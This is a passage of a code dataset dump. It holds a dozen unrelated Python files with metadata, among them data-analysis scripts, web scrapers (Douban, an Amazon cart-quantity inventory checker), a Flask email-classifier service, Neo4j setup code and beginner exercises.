None:\n frame = e.image\n draw_predict_info(frame, e.get_error_codes())\n return frame\n\n\ndef detect_camera():\n cap = cv2.VideoCapture(0)\n while True:\n ret, frame = cap.read()\n if not ret:\n print(\"no frame\")\n break\n\n frame = detect_on_img(frame)\n cv2.imshow('frame', frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n cap.release()\n cv2.destroyAllWindows()\n\n\nif __name__ == '__main__':\n detect_camera()\n","sub_path":"tests/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"273823858","text":"from oas_erf.constants import path_data_info\nfrom pathlib import Path\nimport pandas as pd\nimport numpy as np\nimport xarray as xr\n\n\ndef get_casen_by_type_mod(case_type, model_type):\n if case_type == 'PD':\n ct = 'PIaerPD'\n else:\n ct = case_type\n sims = pd.read_csv(Path(path_data_info) / 'simulation_types.csv', index_col=0)\n case = sims.loc[ct, model_type]\n return case\n\n\ndef get_diff_by_type(cases_dic,\n varl,\n case_types=None,\n mod_types=None,\n ctrl='ctrl',\n relative=False):\n \"\"\"\n Calculates difference between cases case relevant ctrl.\n Example: If\n ctrl='PI'\n case_types=['PI', 'PD'],\n mod_types=['OsloAeroSec', 'OsloAero$_{def}$']\n then the output will be the difference between the PD and PI runs for OsloAeroSec and\n OsloAero_def respectively, outputting dic[model_type] dic.\n :param cases_dic: dictionary with case names as keys and xr.Datasets as elements\n :param varl:\n :param case_types:\n :param mod_types:\n :param ctrl:\n :param relative:\n :return:\n \"\"\"\n sims = pd.read_csv(Path(path_data_info) / 'simulation_types.csv', index_col=0)\n if case_types is None:\n case_types = ['incYield', 'decYield']\n if mod_types is None:\n mod_types = ['OsloAeroSec', 'OsloAero$_{imp}$', 'OsloAero$_{def}$']\n di = {}\n print(case_types, mod_types)\n for case_type in case_types:\n ctlab = f'{case_type}-{ctrl}'\n if relative:\n ctlab = f'({case_type}-{ctrl})/{ctrl}'\n di[ctlab] = {}\n for mod_type in mod_types:\n case = sims.loc[case_type, mod_type]\n case_ctrl = sims.loc[ctrl, mod_type]\n # _df = df2[var]\n if relative:\n di[ctlab][mod_type] = 100. 
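Note that the wholesale clustering script above calls `DataFrame.as_matrix()`, which was deprecated in pandas 0.23 and removed in 1.0; a sketch of the modern replacement (toy numbers, column names taken from the script):

```python
import pandas as pd
from sklearn.preprocessing import StandardScaler

df = pd.DataFrame({"Grocery": [100, 200, 300], "Milk": [50, 80, 120]})
X = df[["Grocery", "Milk"]].to_numpy(dtype="float32")  # replaces the removed as_matrix()
X = StandardScaler().fit_transform(X)                  # mean 0, variance 1, as in the script
print(X.shape)
```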
* (cases_dic[case][varl] - cases_dic[case_ctrl][varl]) / np.abs(\n cases_dic[case_ctrl][varl])\n if isinstance(di[ctlab][mod_type], xr.Dataset):\n for var in varl:\n di[ctlab][mod_type][var].attrs['units'] = '%'\n else:\n print(f'subtracting {case}-{case_ctrl}')\n di[ctlab][mod_type] = cases_dic[case][varl] - cases_dic[case_ctrl][varl]\n\n return di\n\n\ndef get_abs_by_type(cases_dic,\n case_types=None,\n mod_types=None):\n \"\"\"\n From dict(case_name:xr.Dataset,...) to dict(case_type:{mod_type:xr.Dataset})\n :param cases_dic: dict\n :param case_types: list\n :param mod_types: list\n :return: dict\n \"\"\"\n\n sims = pd.read_csv(Path(path_data_info) / 'simulation_types.csv', index_col=0)\n if case_types is None:\n case_types = ['incYield', 'decYield']\n if mod_types is None:\n mod_types = ['OsloAeroSec', 'OsloAero$_{imp}$', 'OsloAero$_{def}$']\n di = {}\n print(case_types, mod_types)\n for case_type in case_types:\n # ctlab = f'{case_type}-{ctrl}'\n di[case_type] = {}\n for mod_type in mod_types:\n case = sims.loc[case_type, mod_type]\n di[case_type][mod_type] = cases_dic[case]\n return di\n\n\ndef transpose_2lev_dic(dic_abs, ctrl='ctrl'):\n dic_absT = {}\n _case_t = list(dic_abs.keys())\n _mod_t = list(dic_abs[_case_t[0]].keys())\n if ctrl is None:\n l = _case_t\n else:\n l = _case_t + [ctrl]\n for mo in _mod_t:\n dic_absT[mo] = {}\n for type in l:\n dic_absT[mo][type] = dic_abs[type][mo]\n return dic_absT\n","sub_path":"oas_erf/data_info/simulation_types.py","file_name":"simulation_types.py","file_ext":"py","file_size_in_byte":3533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"310852053","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jun 24 11:07:39 2018\n\n@author: aoieht\n\"\"\"\n\n\nimport pandas as pd\nimport numpy as np\nfrom numpy.linalg import inv\nfrom datetime import timedelta\n\n#导入事件样本\nevent_path = '../raw_data/event_sample.xlsx'\nevent_sample = pd.read_excel(event_path)\nevent_sample = event_sample.set_index(event_sample['股票代码'].map(str)+'@'+event_sample['会计年度'])\n\n#导入个股日换手率数据\nturnover_data_path = '../raw_data/historical_daily_turnover_rate_all_stock/daily_turnover_rate.xlsx'\ndaily_turnover = pd.read_excel(turnover_data_path).set_index('日期_Date')\n\n#导入市场日换手率数据\nmkt_turnover_path = '../raw_data/historical_daily_turnover_rate_all_stock/Market_TurnoverRate.xlsx'\nmkt_turnover = pd.read_excel(mkt_turnover_path).set_index('日期')\n\ntmp_columns = []\nfor i in range(-10, 11): #事件窗口列标签\n tmp_columns.append('t_'+str(i))\nab_tr = pd.DataFrame(data=None, index=event_sample.index, columns=tmp_columns)\n\nfor e in range(len(event_sample)):\n try:\n tmp_stock = event_sample.iloc[e]['股票代码']\n tmp_event_date = pd.to_datetime(event_sample.iloc[e]['预计披露日期'])\n if tmp_event_date.isoweekday() == 6: #公告日为周末的调整为交易日\n tmp_event_date = (tmp_event_date + timedelta(days=2)).strftime('%Y-%m-%d')\n elif tmp_event_date.isoweekday() == 7:\n tmp_event_date = (tmp_event_date + timedelta(days=1)).strftime('%Y-%m-%d')\n else:\n tmp_event_date = (tmp_event_date).strftime('%Y-%m-%d')\n \n tmp_tr_series = daily_turnover.loc[:,tmp_stock].dropna() #当前股票的日换手率序列\n tmp_loc = tmp_tr_series.index.get_loc(tmp_event_date)\n \n #非事件窗口: [t_0 - 135, t_0 - 11]与[t_0 + 11, t_0 + 135]之并\n nonevent_window_tr = tmp_tr_series.iloc[np.r_[tmp_loc-135:tmp_loc-10,tmp_loc+11:tmp_loc+136]]\n nonevent_window_mkttr = mkt_turnover.loc[nonevent_window_tr.index]\n \n #事件窗口: [t_0 - 10, t_0 + 10]\n event_window_tr = 
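`transpose_2lev_dic` above swaps the two key levels of a `{case_type: {mod_type: data}}` mapping; the same flip as a dict comprehension on toy data (values fabricated for illustration):

```python
nested = {"PD": {"sec": 1, "def": 2}, "PI": {"sec": 3, "def": 4}}
flipped = {m: {c: nested[c][m] for c in nested} for m in nested["PD"]}
print(flipped)  # {'sec': {'PD': 1, 'PI': 3}, 'def': {'PD': 2, 'PI': 4}}
```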
tmp_tr_series.iloc[tmp_loc-10:tmp_loc+11]\n event_window_mkttr = mkt_turnover.loc[event_window_tr.index]\n \n tmp_abtr = (event_window_tr.values - np.transpose(event_window_mkttr.values)) - np.nanmean(nonevent_window_tr.values - np.transpose(nonevent_window_mkttr.values)) #事件窗口日度abnormal turnover rate\n ab_tr.iloc[e] = tmp_abtr\n except:\n continue\n \ncatr = np.sum(ab_tr.loc[:,['t_-5','t_-4','t_-3','t_-2','t_-1']], axis=1).to_frame(name='CATR_[-5,-1]').replace(to_replace=0,value=np.nan) #事件日前5交易���的累计abnormal turnover rate记CATR\nexceldata = pd.concat([ab_tr,catr],axis=1)\nexceldata.to_excel('event_window_daily_abnormal_turnover_rate.xlsx')","sub_path":"event_window_abnormal_turnover_rate/abnormal_turnover_rate_calculation.py","file_name":"abnormal_turnover_rate_calculation.py","file_ext":"py","file_size_in_byte":2817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"98243966","text":"\"Ideogenesis: Database setup; indexes and constraints.\"\n\nfrom __future__ import print_function, absolute_import\n\nimport logging\nimport json\n\nfrom ideogenesis import constants\nfrom ideogenesis import settings\nfrom ideogenesis import utils\n\n\ndef setup(neo4j):\n \"Create uniqeness constraints if not done.\"\n ensure_uniqueness(neo4j, 'Any', 'iuid')\n ensure_uniqueness(neo4j, 'User', 'username_normalized')\n ensure_uniqueness(neo4j, 'User', 'email')\n ensure_uniqueness(neo4j, 'Person', 'name_normalized')\n ensure_index(neo4j, 'Person', 'sortname')\n ensure_index(neo4j, 'Person', 'shortname')\n ensure_uniqueness(neo4j, 'Text', 'title_normalized')\n ensure_uniqueness(neo4j, 'Info', 'path')\n\ndef ensure_uniqueness(neo4j, label, property_key):\n url = neo4j.get_url('constraints', \"{}/uniqueness\".format(label))\n response = neo4j.session.get(url)\n neo4j.check_http(response, 200)\n if exists_uniqueness(response.json(), label, [property_key]):\n logging.info(\"Uniqueness constraint for {}:{} exists\".format(\n label, property_key))\n else:\n data = json.dumps(dict(property_keys=[property_key]))\n response = neo4j.session.post(url, data=data)\n neo4j.check_http(response, 200)\n logging.info(\"Created uniqueness constraint for {}:{}\".format(\n label, property_key))\n\ndef exists_uniqueness(data, label, property_keys):\n \"Does a uniqueness constraint exist for the given label and property keys?\"\n for item in data:\n if item['label'] != label: continue\n if item['type'] != 'UNIQUENESS': continue\n if set(item['property_keys']) == set(property_keys): return True\n return False\n\ndef ensure_index(neo4j, label, property_key):\n url = neo4j.get_url('indexes', label)\n response = neo4j.session.get(url)\n neo4j.check_http(response, 200)\n if exists_index(response.json(), label, [property_key]):\n logging.info(\"Index for {}:{} exists\".format(label, property_key))\n else:\n data = json.dumps(dict(property_keys=[property_key]))\n response = neo4j.session.post(url, data=data)\n neo4j.check_http(response, 200)\n logging.info(\"Created index for {}:{}\".format(label, property_key))\n\ndef exists_index(data, label, property_keys):\n \"Does an index exist for the given label and property keys?\"\n for item in data:\n if item['label'] != label: continue\n if set(item['property_keys']) == set(property_keys): return True\n return False\n\n\nif __name__ == '__main__':\n args = utils.get_args(description='Ideogenesis db index setup')\n utils.load_settings(filepath=args.settings, verbose=args.verbose)\n neo4j = utils.get_neo4j(check=True)\n print('Neo4j server', 
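The event-study script above nudges weekend announcement dates onto the next trading day before indexing into the turnover series; the same adjustment isolated as a small helper (a sketch that, like the script, ignores exchange holidays):

```python
# Sketch of the weekend-to-weekday shift used for announcement dates.
from datetime import datetime, timedelta

def next_trading_day(d: datetime) -> datetime:
    # Saturday (isoweekday 6) -> +2 days, Sunday (7) -> +1 day; weekdays unchanged.
    shift = {6: 2, 7: 1}.get(d.isoweekday(), 0)
    return d + timedelta(days=shift)

print(next_trading_day(datetime(2018, 6, 23)))  # Saturday -> Monday 2018-06-25
```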
neo4j.version)\n    setup(neo4j)\n","sub_path":"ideogenesis/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"24430545","text":"import requests\n\ndef status_check(status_code):\n    if status_code == 200:\n        print(str(status_code) + ': OK')\n    else:\n        print(str(status_code) + ': Failed')\n\n\ns = requests.Session()\n\n# \"ownership_code\": \"0\", \"datatype_code\": \"3\",\"case_code\": \"A\"\n\n#url = \"https://data.bls.gov/cgi-bin/dsrv?cs\"  # survey-specific variant, unused\nurl = \"https://data.bls.gov/cgi-bin/dsrv\"\n\nparams = {\"state_code\": \"00\", \"level\": \"1\", \"survey\": \"cs\", \"format\": \"\",\"html_tables\": \"\", \"delimiter\": \"\",\n          \"catalog\": \"\", \"print_line_length\": \"\", \"lines_per_page\": \"\", \"row_stub_key\": \"\", \"year\": \"\",\n          \"date\": \"\", \"net_change_start\": \"\", \"net_change_end\": \"\", \"percent_change_start\": \"\",\n          \"percent_change_end\": \"\"}\n\n#page = s.post(url, params=params, stream=True)\npage = s.get(url, params=params)\n\nprint(url)\nstatus_check(page.status_code)\n\nprint(page.text)","sub_path":"bls_web_test.py","file_name":"bls_web_test.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"338676220","text":"# counts lattice points (x, y) with x >= 0, y >= 0 and x*x + y*y < n\nn = int(input(\"Input n > \"))\n\ny = 0\nx = 0\nwhile y * y < n:\n    y += 1\nans = y\n\nwhile True:\n    x += 1\n    stop_iteration = False\n    while x * x + y * y >= n:\n        y -= 1\n        if y < 0:\n            stop_iteration = True\n            break\n    if stop_iteration:\n        break\n    ans += y + 1\n\nprint(\"%s possible solutions\" % ans)\n","sub_path":"1.1.29.py","file_name":"1.1.29.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"426533646","text":"# Write a program to prompt the user for hours and rate per hour using \n# input to compute gross pay. \n# Pay the hourly rate for the hours up to 40 and 1.5 times the hourly rate\n# for all hours worked above 40 hours. Use 45 hours and a rate of 10.50 per hour\n# to test the program (the pay should be 498.75). \n# You should use input to read a string and float() to convert the string to a number. \n# Do not worry about error checking the user input - assume the user types numbers properly. 
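The BLS probe above hand-rolls its status check; requests ships `raise_for_status()` for the same purpose (a sketch; httpbin.org is a stand-in endpoint, not the BLS service):

```python
import requests

resp = requests.get("https://httpbin.org/get", params={"q": "demo"}, timeout=10)
resp.raise_for_status()  # raises requests.HTTPError on any 4xx/5xx response
print(resp.status_code, resp.url)
```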
\ninputhours = input(\"Enter Hours:\")\nhours = float(inputhours)\ninputrate = input(\"Rate:\")\nrate = float(inputrate)\nif (hours > 40):\n regHours = 40\n overHours = hours - 40\nelse:\n\tregHours = hours\n\toverHours = 0\n\npay = regHours * rate + overHours * rate * 1.5\n\nprint(pay)","sub_path":"pay.py","file_name":"pay.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"452844264","text":"import csv\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\n\n\nurl=(\"https://movie.douban.com/top250\")\n\nresult=[]\n\ndef get_full_title(movie_Obj):\n title_info = movie_Obj.findAll(\"div\",{\"class\":\"hd\"})\n titles = title_info[0].findAll(\"span\",{\"class\":{\"title\", \"other\"}})\n full_title = ''\n for title in titles:\n full_title += title.get_text()\n return full_title\n\ndef get_movie_info(movie_Obj):\n info = movie_Obj.findAll(\"div\",{\"class\":\"bd\"})[0].find(\"p\").get_text().replace(\" \",'').strip()\n return info\n\ndef get_star(movie_Obj):\n star = movie_Obj.find(\"span\",{\"class\":\"rating_num\"}).get_text()\n return star\n\ndef get_quote(movie_Obj):\n quote = movie_Obj.find(\"span\",{\"class\":\"inq\"})\n if quote:\n quote = quote.get_text()\n else:\n quote = ''\n return quote\n\ndef get_next_url(page):\n next_url = page.find(\"link\",{\"rel\":\"next\"})\n if next_url:\n return url + next_url[\"href\"]\n else:\n return False\n\ndef parse_page(movies_Obj):\n for movie_Obj in movies_Obj:\n movie_result=[]\n movie_result.append(get_full_title(movie_Obj))\n movie_result.append(get_movie_info(movie_Obj))\n movie_result.append(get_star(movie_Obj))\n movie_result.append(get_quote(movie_Obj))\n result.append(movie_result)\n\n\ndef main(url):\n print('Fatching URL: ',url)\n html = urlopen(url)\n page = BeautifulSoup(html.read(),'lxml')\n movies_Obj = page.findAll(\"div\", {\"class\":\"info\"})\n parse_page(movies_Obj)\n next_url = get_next_url(page)\n if next_url:\n main(next_url)\n\nmain(url)\nwith open('test.csv', 'w+', newline='', encoding='utf-8') as csv_file:\n writer = csv.writer(csv_file)\n writer.writerow(('影片标题', '影片信息', '影片评分', '引用'))\n writer.writerows(result)\n","sub_path":"douban.py","file_name":"douban.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"338386467","text":"from collections import Counter\n\nN = int(input())\nS = [input() for _ in range(N)]\ncount_s = []\nfor s in S:\n tmp = 0\n if len(list(filter(lambda x: s[0], s))) == 1:\n continue\n for word in s:\n tmp += 10 ** (ord(word) - ord(\"a\"))\n count_s.append(tmp)\n\npattern = Counter(count_s)\nans = 0\nfor i in pattern.values():\n ans += (i*(i-1)) // 2\nprint(ans)\n","sub_path":"contest/abc137/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"257554656","text":"import logging\nfrom logging.handlers import TimedRotatingFileHandler\nimport pandas as pd\nfrom flask import Flask, abort, redirect, request, jsonify\nfrom flask_restful import Resource, Api, reqparse\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfTransformer\nfrom sklearn.linear_model import LogisticRegression\nimport scipy\nimport pickle\n\ndef people_tokenizer(s):\n people = s.split(';')\n return filter(None, people)\n\napp = Flask(__name__)\napi = 
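The ABC137 solution above encodes each word as a sum of powers of ten per letter so that anagrams collide on the same key; the more common sorted-string formulation, on a toy input, gives the same pair count:

```python
# Equivalent anagram-pair count using sorted strings as keys.
from collections import Counter

words = ["acornistnt", "peanutbomb", "constraint"]  # illustrative input
counts = Counter("".join(sorted(w)) for w in words)
pairs = sum(c * (c - 1) // 2 for c in counts.values())
print(pairs)  # 1: "acornistnt" and "constraint" are anagrams
```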
Api(app)\nparser = reqparse.RequestParser()\nparser.add_argument('Body', type=str, help='The body of the email to be sorted.')\nparser.add_argument('Subject', type=str, help='The subject of the email to be sorted.')\nparser.add_argument('ToRecipients', type=str, help='The to line of the email to be sorted, semi-colon separated')\nparser.add_argument('Sender', type=str, help='The sender of the email to be sorted')\nparser.add_argument('CcRecipients', type=str, help='The cc line of the email to be sorted, semi-colon separated')\nparser.add_argument('SentDateTime', type=str, help='The datetime that the email was sent.')\n\nclass HelloWorld(Resource):\n def get(self):\n return {}\n\n# TODO: Serve N predictions in one request to improve performance\nclass Prediction(Resource):\n def post(self):\n args = parser.parse_args()\n app.logger.debug(args)\n\n # userId = '8lWZYw-u-yNbGBkC4B--ip77K1oVwwyZTHKLeD7rm7k'\n userId = request.args['userId']\n\n # Load message as pandas dataframe\n query_message = pd.DataFrame(args, index=[0])\n app.logger.debug(query_message.head(5))\n\n # TODO: Load model from local file, since we only have one user right now.\n # TODO: Could hold in memory to limit i/o on every request\n try:\n app.logger.debug('Reading model for user {0} from disk'.format(userId))\n pkl_name = '{0}.pkl'.format(userId)\n pipeline = pickle.load(open(pkl_name, 'rb'))\n \n except Exception as ex:\n app.logger.error(str(ex))\n raise ex\n\n app.logger.debug(pipeline)\n sub_vect = pipeline.named_steps['sub_vocab']\n sub_tfidf = pipeline.named_steps['sub_tfidf']\n people_vect = pipeline.named_steps['people_vocab']\n trained_model = pipeline.named_steps['classifier']\n\n # Perform bag of words vectorization on Subject\n subject_counts = sub_vect.transform(query_message['Subject'])\n app.logger.debug('Performed bag of words feature construction on subject')\n\n # Convert Subject from bools to tf-idf values\n subject_tfidf = sub_tfidf.transform(subject_counts)\n\n # Create a new column that merges CC, To, From\n query_message['CcRecipients'].fillna('', inplace=True)\n query_message['ToRecipients'].fillna('', inplace=True)\n query_message['Sender'].fillna('', inplace=True)\n query_message['People'] = query_message['Sender'] + ';' + query_message['CcRecipients'] + ';' + query_message['ToRecipients']\n app.logger.debug(query_message.head(5))\n\n # Convert people column into email address counts\n people_counts = people_vect.transform(query_message['People'])\n app.logger.debug('Performed one hot encodig of people column')\n\n # Merge people counts with subject tf-idf\n feature_matrix = scipy.sparse.hstack([people_counts, subject_tfidf])\n\n # Make prediction on resulting query message\n class_predictions = trained_model.predict_proba(feature_matrix)\n app.logger.debug(class_predictions)\n prediction_idx = -1\n best_prediction = 0\n for idx, prediction in enumerate(class_predictions[0]):\n if prediction > best_prediction:\n prediction_idx = idx\n best_prediction = prediction\n\n return { 'class_label': trained_model.classes_[prediction_idx], 'probability': best_prediction }\n\napi.add_resource(Prediction, '/predict/')\napi.add_resource(HelloWorld, '/hello/')\n\nif __name__ == '__main__':\n\n logHandler = TimedRotatingFileHandler('./logs/predictions.log', when=\"D\", interval=1, backupCount=0)\n logHandler.setLevel(logging.DEBUG)\n app.logger.setLevel(logging.DEBUG)\n app.logger.addHandler(logHandler)\n\n app.run(port=5000, 
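The prediction endpoint above scans `predict_proba` output with a manual max loop; `numpy.argmax` collapses that to one call (self-contained sketch with a toy classifier; the labels are fabricated):

```python
import numpy as np
from sklearn.linear_model import LogisticRegression

X = np.array([[0.0], [1.0], [2.0], [3.0]])
y = np.array(["inbox", "inbox", "archive", "archive"])
clf = LogisticRegression().fit(X, y)

proba = clf.predict_proba([[2.5]])[0]
idx = int(np.argmax(proba))   # index of the most probable class
print({"class_label": clf.classes_[idx], "probability": float(proba[idx])})
```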
host='0.0.0.0')","sub_path":"prediction_service/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"401760684","text":"# Import JSON and urllib.request module\n\nimport json\nimport urllib.request\n\n# Create a function printResults to store parsed json using 'loads' method using features found in json key value pair data from usgs website\n\ndef printResults(data):\n\n theJSON = json.loads(data)\n\n if \"title\" in theJSON[\"metadata\"]:\n print(theJSON[\"metadata\"][\"title\"])\n\n count = theJSON[\"metadata\"][\"count\"]\n print(str(count) + \" events recorded\")\n\n for i in theJSON[\"features\"]:\n print(i[\"properties\"][\"place\"])\n print(\"------------------\\n\")\n\n for i in theJSON[\"features\"]:\n if i[\"properties\"][\"mag\"] >= 4.0:\n print(\"%2.1f\" % i[\"properties\"][\"mag\"], i[\"properties\"][\"place\"])\n print(\"------------------\\n\")\n\n# Main function to load url data from usgs website\n\ndef main():\n\n urldata = \"https://earthquake.usgs.gov/earthquakes/feed/v1.0/summary/2.5_day.geojson\"\n\n# Error handling option to first check if you can connect to the website\n\n webUrl = urllib.request.urlopen(urldata)\n print('result code: ' + str(webUrl.getcode()))\n if (webUrl.getcode() == 200):\n\n# If no error found read the webUrl data and store results in printResults(data)\n\n data = webUrl.read()\n printResults(data)\n else:\n print(\"Received error, cannot parse results\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"USGS_JSON_parsing.py","file_name":"USGS_JSON_parsing.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"336640172","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nimport cv2 as cv\n\n#_________________________________________\noriginal = cv.imread('table.jpg')\ncv.imshow('Original', original)\n#-----角点检测---先变成灰度图\ngray = cv.cvtColor(original, cv.COLOR_BGR2GRAY)\ncv.imshow('gray', gray)\n\n# star特征点检测器\nstar = cv.xfeatures2d.StarDetector_create()\nkeypoints = star.detect(gray)\nmixture = original.copy()\ncv.drawKeypoints(original, keypoints, mixture,\n flags=cv.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)\ncv.imshow('Mixture', mixture)\ncv.waitKey()\n","sub_path":"PythonWeb/基础/前端课程资料/买的网页/MS/day7/star.py","file_name":"star.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"16379219","text":"### COMPOSITION / AGGREGATION\n# Part 3\n#\n\nprint(\"PART 3\")\n\n# Let's make a simple class to hold and display book information\nclass Book:\n def __init__(self, title, author, publishing_year):\n self.title = title\n self.author = author\n self.year = publishing_year\n \n def display(self):\n print(\"TITLE: %s, by %s (%d)\" % (self.title, self.author, self.year))\n\n# ... and class shelf that will just store books\nclass Shelf:\n def __init__(self):\n self.books = []\n \n def add(self, book):\n self.books.append(book)\n \n def show(self):\n print(\"\\nThis shelf contains:\")\n for b in self.books:\n b.display()\n \n# Create 3 books\nbook1 = Book(\"Intro. 
to Python\", \"Jos\", 2015)\nbook2 = Book(\"Hobbit\", \"Tolkien\", 1937)\nbook3 = Book(\"Pride and Prejudice\", \"Jane Austen\", 1813)\n\n# To test that everything works, we will call display for all\nbook1.display()\nbook2.display()\nbook3.display()\n\n# Next we create our shelf object and add 2 books to it\nmyshelf = Shelf()\nmyshelf.add(book1)\nmyshelf.add(book2)\n\n# If everything is implemented correctly,\n# ... calling show method will display all books\nmyshelf.show()\n\n\nprint(\"\\n\\nEOF part 3\")\nprint(\"-\"*20)","sub_path":"Analysis 3/ANL3 Lecture 2.2.py","file_name":"ANL3 Lecture 2.2.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"398129894","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.common.by import By\nfrom selenium.common.exceptions import NoSuchElementException\nimport time\n\n#export PATH=$PATH:/Users/leo/Desktop/selenium\n\n\n#####################################\n#for learning purposes only\n#This script automates the task of retrieving an Amazon product listing's inventory data\n#Which take advantage of a well known '999 cart tricks' to qualifying sales of a potential competitor.\n#By tracking the quantity available of the product over several days or weeks, \n#one can have good idea of how many units your potential competition is selling per day.\n#####################################\n\n\ntoCheck = [] #input list of product ASIN \nresult = []\nnum = 1\nfor ASIN in toCheck:\n\t\n\t#launch web browser\n\tdriver = webdriver.Firefox()\n\tdriver.implicitly_wait(30)\n\tdriver.maximize_window()\n\t\n\t#go to amazon product page\n\tdriver.get('https://www.amazon.ca/dp/product/' + ASIN + '/')\n\tprint(num)\n\tnum = num + 1\n\t\n\ttry:\n\t\t#add to cart\n\t\taddtocartBtn = driver.find_element_by_xpath('//*[@id=\"add-to-cart-button\"]')\n\t\tactions = ActionChains(driver)\n\t\tactions.click(addtocartBtn).perform()\n\t\tprint(addtocartBtn)\n\t\n\t\ttime.sleep(1)\n\t\t\n\t\t#view Cart\n\t\tviewCart = driver.find_element_by_xpath('//*[@id=\"hlb-view-cart-announce\"]')\n\t\tviewCart.click()\n\t\tprint(viewCart)\n\n\t\ttime.sleep(1)\n\t\t\n\t\t# find quantity box and set Quantity \n\t\tquantity_box = driver.find_element_by_xpath('//*[@id=\"activeCartViewForm\"]/div[2]/div/div[4]/div/div[3]/div/div/span')\n\t\tprint(quantity_box)\n\t\ttime.sleep(2)\n\t\tquantity_box.click()\n\n\t\tquantity_dropdown = driver.find_element_by_xpath('//*[@id=\"a-popover-3\"]/div/div/ul/li[10]')\n\t\tquantity_dropdown.click()\n\t\t#actions.click(quantity_dropdown).perform()\n\t\n\t\ttime.sleep(2)\n\n\t\tquantity_input = driver.find_element_by_xpath('/html/body/div[1]/div[4]/div/div[4]/div/div[2]/div[4]/form/div[2]/div/div[4]/div/div[3]/div/div/input')\n\t\tquantity_input.send_keys('999')\n\t\tquantity_input.send_keys(Keys.ENTER)\n\t\n\t\ttime.sleep(2)\n\t\n\t\t#get result from quantity box\n\t\ttext = driver.find_element_by_xpath('/html/body/div[1]/div[4]/div/div[4]/div/div[2]/div[4]/form/div[2]/div/div[4]/div[1]/div/div/div/span').text\n\t\tprint(text)\n\t\tresult.append(text)\n\t\ttime.sleep(1)\n\t#pass if product is not available\n\texcept NoSuchElementException:\n\t\ttext = 'NA'\n\t\tresult.append(text)\n\t\tpass\n\tdriver.quit()\n\t\n\nprint(result)\n\n# strip text and get number of inventory\nnumList=[]\nfor i in result:\n\ttry:\n\t\ttem = i.split('only 
')[1]\n\t\tfinal = tem.split(' of')[0]\n\texcept IndexError:\n\t\tfinal = 'NA'\n\t\tpass\n\tnumList.append(final)\nprint(numList)\n\n","sub_path":"get_product_inventory_count.py","file_name":"get_product_inventory_count.py","file_ext":"py","file_size_in_byte":2700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"563945732","text":"\"\"\" Run SSL Analysis specific to the paper \"\"\"\n\nimport os\nimport numpy as np\n\nimport pandas\n\nfrom matplotlib import pyplot as plt\n\nfrom statsmodels.tsa.seasonal import seasonal_decompose\nimport statsmodels.api as sm\nfrom statsmodels.stats.stattools import durbin_watson\nimport statsmodels.formula.api as smf\n\nfrom ulmo import io as ulmo_io\nfrom ulmo.nenya import defs as ulmo_ssl_defs\n\nimport ssl_defs\n\nfrom IPython import embed\n\nif os.getenv('OS_SST'):\n local_modis_file = os.path.join(os.getenv('OS_SST'),\n 'MODIS_L2/Tables/MODIS_L2_std.parquet')\n local_modis_CF_file = os.path.join(os.getenv('OS_SST'),\n 'MODIS_L2/Tables/MODIS_SSL_cloud_free.parquet')\n local_modis_CF_DT2_file = os.path.join(os.getenv('OS_SST'),\n 'MODIS_L2/Tables/MODIS_SSL_cloud_free_DT2.parquet')\n local_modis_96_file = os.path.join(os.getenv('OS_SST'),\n 'MODIS_L2/Tables/MODIS_SSL_96clear.parquet')\n\n# Geography\ngeo_regions = ulmo_ssl_defs.geo_regions\n\n# UMAP ranges for the paper\numap_rngs_dict = {}\n#umap_rngs_dict['weak_DT15'] = [[1.5,3.], # DT15, old UMAP\n# [1.5,3]]\numap_rngs_dict['weak_DT1'] = [[0, 2.0], # DT1, new UMAP\n [-2.5,-0.3]]\n#umap_rngs_dict['weak_DT1'] = [[-1, 1.], # DT1, new UMAP\n# [-3.,-0.5]]\numap_rngs_dict['strong_DT1'] = [[4.0,8-0.7], # DT1, new UMAP\n [2.4,4]]\n\ndef lon_to_lbl(lon):\n if lon < 0:\n return '{:d}W'.format(int(-lon))\n else:\n return '{:d}E'.format(int(lon))\n \ndef lat_to_lbl(lat):\n if lat < 0:\n return '{:d}S'.format(int(-lat))\n else:\n return 